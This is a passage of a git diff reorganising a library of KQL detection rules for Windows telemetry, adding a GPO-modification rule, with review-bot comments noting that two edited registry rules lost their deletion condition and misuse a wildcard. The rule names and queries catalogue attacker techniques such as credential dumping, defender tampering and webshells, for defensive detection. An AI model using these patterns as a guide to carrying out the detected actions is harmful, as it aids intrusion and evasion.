rename to KQL/rules/windows/process_creation/use_of_remote_exe.kql
diff --git a/KQL/rules/Defense Evasion/use_of_scriptrunner_exe.kql b/KQL/rules/windows/process_creation/use_of_scriptrunner_exe.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/use_of_scriptrunner_exe.kql
rename to KQL/rules/windows/process_creation/use_of_scriptrunner_exe.kql
diff --git a/KQL/rules/Defense Evasion/use_of_the_sftp_exe_binary_as_a_lolbin.kql b/KQL/rules/windows/process_creation/use_of_the_sftp_exe_binary_as_a_lolbin.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/use_of_the_sftp_exe_binary_as_a_lolbin.kql
rename to KQL/rules/windows/process_creation/use_of_the_sftp_exe_binary_as_a_lolbin.kql
diff --git a/KQL/rules/Defense Evasion/use_of_ttdinject_exe.kql b/KQL/rules/windows/process_creation/use_of_ttdinject_exe.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/use_of_ttdinject_exe.kql
rename to KQL/rules/windows/process_creation/use_of_ttdinject_exe.kql
diff --git a/KQL/rules/Command and Control/use_of_ultravnc_remote_access_software.kql b/KQL/rules/windows/process_creation/use_of_ultravnc_remote_access_software.kql
similarity index 100%
rename from KQL/rules/Command and Control/use_of_ultravnc_remote_access_software.kql
rename to KQL/rules/windows/process_creation/use_of_ultravnc_remote_access_software.kql
diff --git a/KQL/rules/Defense Evasion/use_of_visualuiaverifynative_exe.kql b/KQL/rules/windows/process_creation/use_of_visualuiaverifynative_exe.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/use_of_visualuiaverifynative_exe.kql
rename to KQL/rules/windows/process_creation/use_of_visualuiaverifynative_exe.kql
diff --git a/KQL/rules/Defense Evasion/use_of_vsiisexelauncher_exe.kql b/KQL/rules/windows/process_creation/use_of_vsiisexelauncher_exe.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/use_of_vsiisexelauncher_exe.kql
rename to KQL/rules/windows/process_creation/use_of_vsiisexelauncher_exe.kql
diff --git a/KQL/rules/Discovery/use_of_w32tm_as_timer.kql b/KQL/rules/windows/process_creation/use_of_w32tm_as_timer.kql
similarity index 100%
rename from KQL/rules/Discovery/use_of_w32tm_as_timer.kql
rename to KQL/rules/windows/process_creation/use_of_w32tm_as_timer.kql
diff --git a/KQL/rules/Defense Evasion/use_of_wfc_exe.kql b/KQL/rules/windows/process_creation/use_of_wfc_exe.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/use_of_wfc_exe.kql
rename to KQL/rules/windows/process_creation/use_of_wfc_exe.kql
diff --git a/KQL/rules/Defense Evasion/use_short_name_path_in_image.kql b/KQL/rules/windows/process_creation/use_short_name_path_in_image.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/use_short_name_path_in_image.kql
rename to KQL/rules/windows/process_creation/use_short_name_path_in_image.kql
diff --git a/KQL/rules/Privilege Escalation/user_added_to_highly_privileged_group.kql b/KQL/rules/windows/process_creation/user_added_to_highly_privileged_group.kql
similarity index 100%
rename from KQL/rules/Privilege Escalation/user_added_to_highly_privileged_group.kql
rename to KQL/rules/windows/process_creation/user_added_to_highly_privileged_group.kql
diff --git a/KQL/rules/Privilege Escalation/user_added_to_local_administrators_group.kql b/KQL/rules/windows/process_creation/user_added_to_local_administrators_group.kql
similarity index 100%
rename from KQL/rules/Privilege Escalation/user_added_to_local_administrators_group.kql
rename to KQL/rules/windows/process_creation/user_added_to_local_administrators_group.kql
diff --git a/KQL/rules/Initial Access/user_added_to_remote_desktop_users_group.kql b/KQL/rules/windows/process_creation/user_added_to_remote_desktop_users_group.kql
similarity index 100%
rename from KQL/rules/Initial Access/user_added_to_remote_desktop_users_group.kql
rename to KQL/rules/windows/process_creation/user_added_to_remote_desktop_users_group.kql
diff --git a/KQL/rules/Discovery/user_discovery_and_export_via_get_aduser_cmdlet.kql b/KQL/rules/windows/process_creation/user_discovery_and_export_via_get_aduser_cmdlet.kql
similarity index 100%
rename from KQL/rules/Discovery/user_discovery_and_export_via_get_aduser_cmdlet.kql
rename to KQL/rules/windows/process_creation/user_discovery_and_export_via_get_aduser_cmdlet.kql
diff --git a/KQL/rules/Privilege Escalation/using_settingsynchost_exe_as_lolbin.kql b/KQL/rules/windows/process_creation/using_settingsynchost_exe_as_lolbin.kql
similarity index 100%
rename from KQL/rules/Privilege Escalation/using_settingsynchost_exe_as_lolbin.kql
rename to KQL/rules/windows/process_creation/using_settingsynchost_exe_as_lolbin.kql
diff --git a/KQL/rules/Defense Evasion/utilityfunctions_ps1_proxy_dll.kql b/KQL/rules/windows/process_creation/utilityfunctions_ps1_proxy_dll.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/utilityfunctions_ps1_proxy_dll.kql
rename to KQL/rules/windows/process_creation/utilityfunctions_ps1_proxy_dll.kql
diff --git a/KQL/rules/Collection/veeam_backup_database_suspicious_query.kql b/KQL/rules/windows/process_creation/veeam_backup_database_suspicious_query.kql
similarity index 100%
rename from KQL/rules/Collection/veeam_backup_database_suspicious_query.kql
rename to KQL/rules/windows/process_creation/veeam_backup_database_suspicious_query.kql
diff --git a/KQL/rules/Collection/veeambackup_database_credentials_dump_via_sqlcmd_exe.kql b/KQL/rules/windows/process_creation/veeambackup_database_credentials_dump_via_sqlcmd_exe.kql
similarity index 100%
rename from KQL/rules/Collection/veeambackup_database_credentials_dump_via_sqlcmd_exe.kql
rename to KQL/rules/windows/process_creation/veeambackup_database_credentials_dump_via_sqlcmd_exe.kql
diff --git a/KQL/rules/Defense Evasion/verclsid_exe_runs_com_object.kql b/KQL/rules/windows/process_creation/verclsid_exe_runs_com_object.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/verclsid_exe_runs_com_object.kql
rename to KQL/rules/windows/process_creation/verclsid_exe_runs_com_object.kql
diff --git a/KQL/rules/Defense Evasion/virtualbox_driver_installation_or_starting_of_vms.kql b/KQL/rules/windows/process_creation/virtualbox_driver_installation_or_starting_of_vms.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/virtualbox_driver_installation_or_starting_of_vms.kql
rename to KQL/rules/windows/process_creation/virtualbox_driver_installation_or_starting_of_vms.kql
diff --git a/KQL/rules/Defense Evasion/visual_basic_command_line_compiler_usage.kql b/KQL/rules/windows/process_creation/visual_basic_command_line_compiler_usage.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/visual_basic_command_line_compiler_usage.kql
rename to KQL/rules/windows/process_creation/visual_basic_command_line_compiler_usage.kql
diff --git a/KQL/rules/Command and Control/visual_studio_code_tunnel_execution.kql b/KQL/rules/windows/process_creation/visual_studio_code_tunnel_execution.kql
similarity index 100%
rename from KQL/rules/Command and Control/visual_studio_code_tunnel_execution.kql
rename to KQL/rules/windows/process_creation/visual_studio_code_tunnel_execution.kql
diff --git a/KQL/rules/Command and Control/visual_studio_code_tunnel_service_installation.kql b/KQL/rules/windows/process_creation/visual_studio_code_tunnel_service_installation.kql
similarity index 100%
rename from KQL/rules/Command and Control/visual_studio_code_tunnel_service_installation.kql
rename to KQL/rules/windows/process_creation/visual_studio_code_tunnel_service_installation.kql
diff --git a/KQL/rules/Command and Control/visual_studio_code_tunnel_shell_execution.kql b/KQL/rules/windows/process_creation/visual_studio_code_tunnel_shell_execution.kql
similarity index 100%
rename from KQL/rules/Command and Control/visual_studio_code_tunnel_shell_execution.kql
rename to KQL/rules/windows/process_creation/visual_studio_code_tunnel_shell_execution.kql
diff --git a/KQL/rules/Execution/visual_studio_nodejstools_pressanykey_arbitrary_binary_execution.kql b/KQL/rules/windows/process_creation/visual_studio_nodejstools_pressanykey_arbitrary_binary_execution.kql
similarity index 100%
rename from KQL/rules/Execution/visual_studio_nodejstools_pressanykey_arbitrary_binary_execution.kql
rename to KQL/rules/windows/process_creation/visual_studio_nodejstools_pressanykey_arbitrary_binary_execution.kql
diff --git a/KQL/rules/Execution/visual_studio_nodejstools_pressanykey_renamed_execution.kql b/KQL/rules/windows/process_creation/visual_studio_nodejstools_pressanykey_renamed_execution.kql
similarity index 100%
rename from KQL/rules/Execution/visual_studio_nodejstools_pressanykey_renamed_execution.kql
rename to KQL/rules/windows/process_creation/visual_studio_nodejstools_pressanykey_renamed_execution.kql
diff --git a/KQL/rules/Execution/vmtoolsd_suspicious_child_process.kql b/KQL/rules/windows/process_creation/vmtoolsd_suspicious_child_process.kql
similarity index 100%
rename from KQL/rules/Execution/vmtoolsd_suspicious_child_process.kql
rename to KQL/rules/windows/process_creation/vmtoolsd_suspicious_child_process.kql
diff --git a/KQL/rules/Credential Access/volumeshadowcopy_symlink_creation_via_mklink.kql b/KQL/rules/windows/process_creation/volumeshadowcopy_symlink_creation_via_mklink.kql
similarity index 100%
rename from KQL/rules/Credential Access/volumeshadowcopy_symlink_creation_via_mklink.kql
rename to KQL/rules/windows/process_creation/volumeshadowcopy_symlink_creation_via_mklink.kql
diff --git a/KQL/rules/Defense Evasion/wab_execution_from_non_default_location.kql b/KQL/rules/windows/process_creation/wab_execution_from_non_default_location.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/wab_execution_from_non_default_location.kql
rename to KQL/rules/windows/process_creation/wab_execution_from_non_default_location.kql
diff --git a/KQL/rules/Defense Evasion/wab_wabmig_unusual_parent_or_child_processes.kql b/KQL/rules/windows/process_creation/wab_wabmig_unusual_parent_or_child_processes.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/wab_wabmig_unusual_parent_or_child_processes.kql
rename to KQL/rules/windows/process_creation/wab_wabmig_unusual_parent_or_child_processes.kql
diff --git a/KQL/rules/Defense Evasion/weak_or_abused_passwords_in_cli.kql b/KQL/rules/windows/process_creation/weak_or_abused_passwords_in_cli.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/weak_or_abused_passwords_in_cli.kql
rename to KQL/rules/windows/process_creation/weak_or_abused_passwords_in_cli.kql
diff --git a/KQL/rules/Exfiltration/webdav_client_execution_via_rundll32_exe.kql b/KQL/rules/windows/process_creation/webdav_client_execution_via_rundll32_exe.kql
similarity index 100%
rename from KQL/rules/Exfiltration/webdav_client_execution_via_rundll32_exe.kql
rename to KQL/rules/windows/process_creation/webdav_client_execution_via_rundll32_exe.kql
diff --git a/KQL/rules/Persistence/webshell_detection_with_command_line_keywords.kql b/KQL/rules/windows/process_creation/webshell_detection_with_command_line_keywords.kql
similarity index 100%
rename from KQL/rules/Persistence/webshell_detection_with_command_line_keywords.kql
rename to KQL/rules/windows/process_creation/webshell_detection_with_command_line_keywords.kql
diff --git a/KQL/rules/Persistence/webshell_hacking_activity_patterns.kql b/KQL/rules/windows/process_creation/webshell_hacking_activity_patterns.kql
similarity index 100%
rename from KQL/rules/Persistence/webshell_hacking_activity_patterns.kql
rename to KQL/rules/windows/process_creation/webshell_hacking_activity_patterns.kql
diff --git a/KQL/rules/Persistence/webshell_tool_reconnaissance_activity.kql b/KQL/rules/windows/process_creation/webshell_tool_reconnaissance_activity.kql
similarity index 100%
rename from KQL/rules/Persistence/webshell_tool_reconnaissance_activity.kql
rename to KQL/rules/windows/process_creation/webshell_tool_reconnaissance_activity.kql
diff --git a/KQL/rules/Discovery/whoami_as_parameter.kql b/KQL/rules/windows/process_creation/whoami_as_parameter.kql
similarity index 100%
rename from KQL/rules/Discovery/whoami_as_parameter.kql
rename to KQL/rules/windows/process_creation/whoami_as_parameter.kql
diff --git a/KQL/rules/Discovery/whoami_exe_execution_anomaly.kql b/KQL/rules/windows/process_creation/whoami_exe_execution_anomaly.kql
similarity index 100%
rename from KQL/rules/Discovery/whoami_exe_execution_anomaly.kql
rename to KQL/rules/windows/process_creation/whoami_exe_execution_anomaly.kql
diff --git a/KQL/rules/Privilege Escalation/whoami_exe_execution_from_privileged_process.kql b/KQL/rules/windows/process_creation/whoami_exe_execution_from_privileged_process.kql
similarity index 100%
rename from KQL/rules/Privilege Escalation/whoami_exe_execution_from_privileged_process.kql
rename to KQL/rules/windows/process_creation/whoami_exe_execution_from_privileged_process.kql
diff --git a/KQL/rules/Discovery/whoami_exe_execution_with_output_option.kql b/KQL/rules/windows/process_creation/whoami_exe_execution_with_output_option.kql
similarity index 100%
rename from KQL/rules/Discovery/whoami_exe_execution_with_output_option.kql
rename to KQL/rules/windows/process_creation/whoami_exe_execution_with_output_option.kql
diff --git a/KQL/rules/Lateral Movement/windows_admin_share_mount_via_net_exe.kql b/KQL/rules/windows/process_creation/windows_admin_share_mount_via_net_exe.kql
similarity index 100%
rename from KQL/rules/Lateral Movement/windows_admin_share_mount_via_net_exe.kql
rename to KQL/rules/windows/process_creation/windows_admin_share_mount_via_net_exe.kql
diff --git a/KQL/rules/Impact/windows_backup_deleted_via_wbadmin_exe.kql b/KQL/rules/windows/process_creation/windows_backup_deleted_via_wbadmin_exe.kql
similarity index 100%
rename from KQL/rules/Impact/windows_backup_deleted_via_wbadmin_exe.kql
rename to KQL/rules/windows/process_creation/windows_backup_deleted_via_wbadmin_exe.kql
diff --git a/KQL/rules/Credential Access/windows_credential_manager_access_via_vaultcmd.kql b/KQL/rules/windows/process_creation/windows_credential_manager_access_via_vaultcmd.kql
similarity index 100%
rename from KQL/rules/Credential Access/windows_credential_manager_access_via_vaultcmd.kql
rename to KQL/rules/windows/process_creation/windows_credential_manager_access_via_vaultcmd.kql
diff --git a/KQL/rules/windows/process_creation/windows_default_domain_gpo_modification_via_gpme.kql b/KQL/rules/windows/process_creation/windows_default_domain_gpo_modification_via_gpme.kql
new file mode 100644
index 00000000..d45f7d5a
--- /dev/null
+++ b/KQL/rules/windows/process_creation/windows_default_domain_gpo_modification_via_gpme.kql
@@ -0,0 +1,13 @@
+// Title: Windows Default Domain GPO Modification via GPME
+// Author: TropChaud
+// Date: 2025-11-22
+// Level: medium
+// Description: Detects the use of the Group Policy Management Editor (GPME) to modify Default Domain or Default Domain Controllers Group Policy Objects (GPOs).
+// Adversaries may leverage GPME to make stealthy changes in these default GPOs to deploy malicious GPOs configurations across the domain without raising suspicion.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1484.001
+// False Positives:
+// - Legitimate use of GPME to modify GPOs
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "31B2F340-016D-11D2-945F-00C04FB984F9" or ProcessCommandLine contains "6AC1786C-016F-11D2-945F-00C04FB984F9") and (ProcessCommandLine contains "gpme.msc" and ProcessCommandLine contains "gpobject:") and (FolderPath endswith "\\mmc.exe" or ProcessVersionInfoOriginalFileName =~ "MMC.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/windows_defender_context_menu_removed.kql b/KQL/rules/windows/process_creation/windows_defender_context_menu_removed.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/windows_defender_context_menu_removed.kql
rename to KQL/rules/windows/process_creation/windows_defender_context_menu_removed.kql
diff --git a/KQL/rules/Defense Evasion/windows_defender_definition_files_removed.kql b/KQL/rules/windows/process_creation/windows_defender_definition_files_removed.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/windows_defender_definition_files_removed.kql
rename to KQL/rules/windows/process_creation/windows_defender_definition_files_removed.kql
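Review bot: The metadata header of the new rule is internally inconsistent: `// MITRE Tactic: Defense Evasion` names a single tactic while the Tags line also carries attack.privilege-escalation, so anything that keys on the Tactic field will miss the second mapping; `// MITRE Tactic: Defense Evasion, Privilege Escalation` would keep the two lines in agreement. The detection itself is reasonable, since the two GUIDs are the well-known, domain-independent identifiers of the Default Domain Policy and Default Domain Controllers Policy and the gpme.msc/gpobject: conjunction pins the editor launch rather than any GPMC browsing. Because administrators do edit these GPOs legitimately, the False Positives entry would be more actionable if it named the triage columns, e.g. `// - Legitimate use of GPME to modify GPOs; triage on AccountName, DeviceName and InitiatingProcessParentFileName`.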
diff --git a/KQL/rules/Defense Evasion/windows_firewall_disabled_via_powershell.kql b/KQL/rules/windows/process_creation/windows_firewall_disabled_via_powershell.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/windows_firewall_disabled_via_powershell.kql
rename to KQL/rules/windows/process_creation/windows_firewall_disabled_via_powershell.kql
diff --git a/KQL/rules/Execution/windows_hotfix_updates_reconnaissance_via_wmic_exe.kql b/KQL/rules/windows/process_creation/windows_hotfix_updates_reconnaissance_via_wmic_exe.kql
similarity index 100%
rename from KQL/rules/Execution/windows_hotfix_updates_reconnaissance_via_wmic_exe.kql
rename to KQL/rules/windows/process_creation/windows_hotfix_updates_reconnaissance_via_wmic_exe.kql
diff --git a/KQL/rules/Lateral Movement/windows_internet_hosted_webdav_share_mount_via_net_exe.kql b/KQL/rules/windows/process_creation/windows_internet_hosted_webdav_share_mount_via_net_exe.kql
similarity index 100%
rename from KQL/rules/Lateral Movement/windows_internet_hosted_webdav_share_mount_via_net_exe.kql
rename to KQL/rules/windows/process_creation/windows_internet_hosted_webdav_share_mount_via_net_exe.kql
diff --git a/KQL/rules/Defense Evasion/windows_kernel_debugger_execution.kql b/KQL/rules/windows/process_creation/windows_kernel_debugger_execution.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/windows_kernel_debugger_execution.kql
rename to KQL/rules/windows/process_creation/windows_kernel_debugger_execution.kql
diff --git a/KQL/rules/Defense Evasion/windows_processes_suspicious_parent_directory.kql b/KQL/rules/windows/process_creation/windows_processes_suspicious_parent_directory.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/windows_processes_suspicious_parent_directory.kql
rename to KQL/rules/windows/process_creation/windows_processes_suspicious_parent_directory.kql
diff --git a/KQL/rules/Collection/windows_recall_feature_enabled_via_reg_exe.kql b/KQL/rules/windows/process_creation/windows_recall_feature_enabled_via_reg_exe.kql
similarity index 100%
rename from KQL/rules/Collection/windows_recall_feature_enabled_via_reg_exe.kql
rename to KQL/rules/windows/process_creation/windows_recall_feature_enabled_via_reg_exe.kql
diff --git a/KQL/rules/Impact/windows_recovery_environment_disabled_via_reagentc.kql b/KQL/rules/windows/process_creation/windows_recovery_environment_disabled_via_reagentc.kql
similarity index 100%
rename from KQL/rules/Impact/windows_recovery_environment_disabled_via_reagentc.kql
rename to KQL/rules/windows/process_creation/windows_recovery_environment_disabled_via_reagentc.kql
diff --git a/KQL/rules/Lateral Movement/windows_share_mount_via_net_exe.kql b/KQL/rules/windows/process_creation/windows_share_mount_via_net_exe.kql
similarity index 100%
rename from KQL/rules/Lateral Movement/windows_share_mount_via_net_exe.kql
rename to KQL/rules/windows/process_creation/windows_share_mount_via_net_exe.kql
diff --git a/KQL/rules/Collection/winrar_compressing_dump_files.kql b/KQL/rules/windows/process_creation/winrar_compressing_dump_files.kql
similarity index 100%
rename from KQL/rules/Collection/winrar_compressing_dump_files.kql
rename to KQL/rules/windows/process_creation/winrar_compressing_dump_files.kql
diff --git a/KQL/rules/Collection/winrar_execution_in_non_standard_folder.kql b/KQL/rules/windows/process_creation/winrar_execution_in_non_standard_folder.kql
similarity index 100%
rename from KQL/rules/Collection/winrar_execution_in_non_standard_folder.kql
rename to KQL/rules/windows/process_creation/winrar_execution_in_non_standard_folder.kql
diff --git a/KQL/rules/Lateral Movement/winrs_local_command_execution.kql b/KQL/rules/windows/process_creation/winrs_local_command_execution.kql
similarity index 100%
rename from KQL/rules/Lateral Movement/winrs_local_command_execution.kql
rename to KQL/rules/windows/process_creation/winrs_local_command_execution.kql
diff --git a/KQL/rules/Defense Evasion/wlrmdr_exe_uncommon_argument_or_child_process.kql b/KQL/rules/windows/process_creation/wlrmdr_exe_uncommon_argument_or_child_process.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/wlrmdr_exe_uncommon_argument_or_child_process.kql
rename to KQL/rules/windows/process_creation/wlrmdr_exe_uncommon_argument_or_child_process.kql
diff --git a/KQL/rules/Privilege Escalation/wmi_backdoor_exchange_transport_agent.kql b/KQL/rules/windows/process_creation/wmi_backdoor_exchange_transport_agent.kql
similarity index 100%
rename from KQL/rules/Privilege Escalation/wmi_backdoor_exchange_transport_agent.kql
rename to KQL/rules/windows/process_creation/wmi_backdoor_exchange_transport_agent.kql
diff --git a/KQL/rules/Persistence/wmi_persistence_script_event_consumer.kql b/KQL/rules/windows/process_creation/wmi_persistence_script_event_consumer.kql
similarity index 100%
rename from KQL/rules/Persistence/wmi_persistence_script_event_consumer.kql
rename to KQL/rules/windows/process_creation/wmi_persistence_script_event_consumer.kql
diff --git a/KQL/rules/Execution/wmic_remote_command_execution.kql b/KQL/rules/windows/process_creation/wmic_remote_command_execution.kql
similarity index 100%
rename from KQL/rules/Execution/wmic_remote_command_execution.kql
rename to KQL/rules/windows/process_creation/wmic_remote_command_execution.kql
diff --git a/KQL/rules/Execution/wmiprvse_spawned_a_process.kql b/KQL/rules/windows/process_creation/wmiprvse_spawned_a_process.kql
similarity index 100%
rename from KQL/rules/Execution/wmiprvse_spawned_a_process.kql
rename to KQL/rules/windows/process_creation/wmiprvse_spawned_a_process.kql
diff --git a/KQL/rules/Defense Evasion/write_protect_for_storage_disabled.kql b/KQL/rules/windows/process_creation/write_protect_for_storage_disabled.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/write_protect_for_storage_disabled.kql
rename to KQL/rules/windows/process_creation/write_protect_for_storage_disabled.kql
diff --git a/KQL/rules/Defense Evasion/writing_of_malicious_files_to_the_fonts_folder.kql b/KQL/rules/windows/process_creation/writing_of_malicious_files_to_the_fonts_folder.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/writing_of_malicious_files_to_the_fonts_folder.kql
rename to KQL/rules/windows/process_creation/writing_of_malicious_files_to_the_fonts_folder.kql
diff --git a/KQL/rules/Execution/wscript_shell_run_in_commandline.kql b/KQL/rules/windows/process_creation/wscript_shell_run_in_commandline.kql
similarity index 100%
rename from KQL/rules/Execution/wscript_shell_run_in_commandline.kql
rename to KQL/rules/windows/process_creation/wscript_shell_run_in_commandline.kql
diff --git a/KQL/rules/Execution/wsl_child_process_anomaly.kql b/KQL/rules/windows/process_creation/wsl_child_process_anomaly.kql
similarity index 100%
rename from KQL/rules/Execution/wsl_child_process_anomaly.kql
rename to KQL/rules/windows/process_creation/wsl_child_process_anomaly.kql
diff --git a/KQL/rules/Defense Evasion/wsl_kali_linux_usage.kql b/KQL/rules/windows/process_creation/wsl_kali_linux_usage.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/wsl_kali_linux_usage.kql
rename to KQL/rules/windows/process_creation/wsl_kali_linux_usage.kql
diff --git a/KQL/rules/Execution/wusa_exe_executed_by_parent_process_located_in_suspicious_location.kql b/KQL/rules/windows/process_creation/wusa_exe_executed_by_parent_process_located_in_suspicious_location.kql
similarity index 100%
rename from KQL/rules/Execution/wusa_exe_executed_by_parent_process_located_in_suspicious_location.kql
rename to KQL/rules/windows/process_creation/wusa_exe_executed_by_parent_process_located_in_suspicious_location.kql
diff --git a/KQL/rules/Defense Evasion/xbap_execution_from_uncommon_locations_via_presentationhost_exe.kql b/KQL/rules/windows/process_creation/xbap_execution_from_uncommon_locations_via_presentationhost_exe.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/xbap_execution_from_uncommon_locations_via_presentationhost_exe.kql
rename to KQL/rules/windows/process_creation/xbap_execution_from_uncommon_locations_via_presentationhost_exe.kql
diff --git a/KQL/rules/Defense Evasion/xsl_script_execution_via_wmic_exe.kql b/KQL/rules/windows/process_creation/xsl_script_execution_via_wmic_exe.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/xsl_script_execution_via_wmic_exe.kql
rename to KQL/rules/windows/process_creation/xsl_script_execution_via_wmic_exe.kql
diff --git a/KQL/rules/Privilege Escalation/xwizard_exe_execution_from_non_default_location.kql b/KQL/rules/windows/process_creation/xwizard_exe_execution_from_non_default_location.kql
similarity index 100%
rename from KQL/rules/Privilege Escalation/xwizard_exe_execution_from_non_default_location.kql
rename to KQL/rules/windows/process_creation/xwizard_exe_execution_from_non_default_location.kql
diff --git a/KQL/rules/Persistence/potential_persistence_via_disk_cleanup_handler_registry.kql b/KQL/rules/windows/registry/registry_add/potential_persistence_via_disk_cleanup_handler_registry.kql
similarity index 100%
rename from KQL/rules/Persistence/potential_persistence_via_disk_cleanup_handler_registry.kql
rename to KQL/rules/windows/registry/registry_add/potential_persistence_via_disk_cleanup_handler_registry.kql
diff --git a/KQL/rules/Defense Evasion/delete_defender_scan_shellex_context_menu_registry_key.kql b/KQL/rules/windows/registry/registry_delete/delete_defender_scan_shellex_context_menu_registry_key.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/delete_defender_scan_shellex_context_menu_registry_key.kql
rename to KQL/rules/windows/registry/registry_delete/delete_defender_scan_shellex_context_menu_registry_key.kql
diff --git a/KQL/rules/Defense Evasion/folder_removed_from_exploit_guard_protectedfolders_list_registry.kql b/KQL/rules/windows/registry/registry_delete/folder_removed_from_exploit_guard_protectedfolders_list_registry.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/folder_removed_from_exploit_guard_protectedfolders_list_registry.kql
rename to KQL/rules/windows/registry/registry_delete/folder_removed_from_exploit_guard_protectedfolders_list_registry.kql
diff --git a/KQL/rules/Defense Evasion/removal_of_amsi_provider_registry_keys.kql b/KQL/rules/windows/registry/registry_delete/removal_of_amsi_provider_registry_keys.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/removal_of_amsi_provider_registry_keys.kql
rename to KQL/rules/windows/registry/registry_delete/removal_of_amsi_provider_registry_keys.kql
diff --git a/KQL/rules/Defense Evasion/removal_of_index_value_to_hide_schedule_task_registry.kql b/KQL/rules/windows/registry/registry_delete/removal_of_index_value_to_hide_schedule_task_registry.kql
similarity index 67%
rename from KQL/rules/Defense Evasion/removal_of_index_value_to_hide_schedule_task_registry.kql
rename to KQL/rules/windows/registry/registry_delete/removal_of_index_value_to_hide_schedule_task_registry.kql
index 41f0ea4a..01d28725 100644
--- a/KQL/rules/Defense Evasion/removal_of_index_value_to_hide_schedule_task_registry.kql
+++ b/KQL/rules/windows/registry/registry_delete/removal_of_index_value_to_hide_schedule_task_registry.kql
@@ -7,4 +7,4 @@
 // Tags: attack.defense-evasion, attack.t1562
 
 DeviceRegistryEvents
-| where (ActionType in~ ("RegistryKeyDeleted", "RegistryValueDeleted")) and (RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree*" and RegistryKey contains "Index")
\ No newline at end of file
+| where RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree*" and RegistryKey contains "Index"
\ No newline at end of file
diff --git a/KQL/rules/Persistence/removal_of_potential_com_hijacking_registry_keys.kql b/KQL/rules/windows/registry/registry_delete/removal_of_potential_com_hijacking_registry_keys.kql
similarity index 100%
rename from KQL/rules/Persistence/removal_of_potential_com_hijacking_registry_keys.kql
rename to KQL/rules/windows/registry/registry_delete/removal_of_potential_com_hijacking_registry_keys.kql
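Review bot: Removing the `ActionType in~ ("RegistryKeyDeleted", "RegistryValueDeleted")` clause takes away the only part of the query that expressed a deletion, so the new `| where` now matches every DeviceRegistryEvents row under the TaskCache\Tree path, including the value-set events produced whenever a task is registered, while the rule title and the registry_delete folder still promise a removal; the SD rule in the next hunk has the same regression. Two further problems survive from the old side: KQL `endswith` does not treat `*` as a wildcard, so `endswith "...\\TaskCache\\Tree*"` can never match a real key path, and in the MDE schema the deleted value's name is carried in RegistryValueName rather than appended to RegistryKey, so `RegistryKey contains "Index"` does not test the value the rule is named after. A condition that keeps the deletion semantics and matches the schema would be `| where ActionType in~ ("RegistryKeyDeleted", "RegistryValueDeleted") and RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\" and RegistryValueName =~ "Index"`, with `"SD"` substituted for the sibling rule.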
diff --git a/KQL/rules/Defense Evasion/removal_of_sd_value_to_hide_schedule_task_registry.kql b/KQL/rules/windows/registry/registry_delete/removal_of_sd_value_to_hide_schedule_task_registry.kql
similarity index 64%
rename from KQL/rules/Defense Evasion/removal_of_sd_value_to_hide_schedule_task_registry.kql
rename to KQL/rules/windows/registry/registry_delete/removal_of_sd_value_to_hide_schedule_task_registry.kql
index de6ae2a0..6896874e 100644
--- a/KQL/rules/Defense Evasion/removal_of_sd_value_to_hide_schedule_task_registry.kql
+++ b/KQL/rules/windows/registry/registry_delete/removal_of_sd_value_to_hide_schedule_task_registry.kql
@@ -7,4 +7,4 @@
 // Tags: attack.defense-evasion, attack.t1562
 
 DeviceRegistryEvents
-| where (ActionType in~ ("RegistryKeyDeleted", "RegistryValueDeleted")) and (RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree*" and RegistryKey contains "SD")
\ No newline at end of file
+| where RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree*" and RegistryKey contains "SD"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/runmru_registry_key_deletion_registry.kql b/KQL/rules/windows/registry/registry_delete/runmru_registry_key_deletion_registry.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/runmru_registry_key_deletion_registry.kql
rename to KQL/rules/windows/registry/registry_delete/runmru_registry_key_deletion_registry.kql
diff --git a/KQL/rules/Persistence/terminal_server_client_connection_history_cleared_registry.kql b/KQL/rules/windows/registry/registry_delete/terminal_server_client_connection_history_cleared_registry.kql
similarity index 100%
rename from KQL/rules/Persistence/terminal_server_client_connection_history_cleared_registry.kql
rename to KQL/rules/windows/registry/registry_delete/terminal_server_client_connection_history_cleared_registry.kql
diff --git a/KQL/rules/Collection/windows_recall_feature_enabled_disableaidataanalysis_value_deleted.kql b/KQL/rules/windows/registry/registry_delete/windows_recall_feature_enabled_disableaidataanalysis_value_deleted.kql
similarity index 100%
rename from KQL/rules/Collection/windows_recall_feature_enabled_disableaidataanalysis_value_deleted.kql
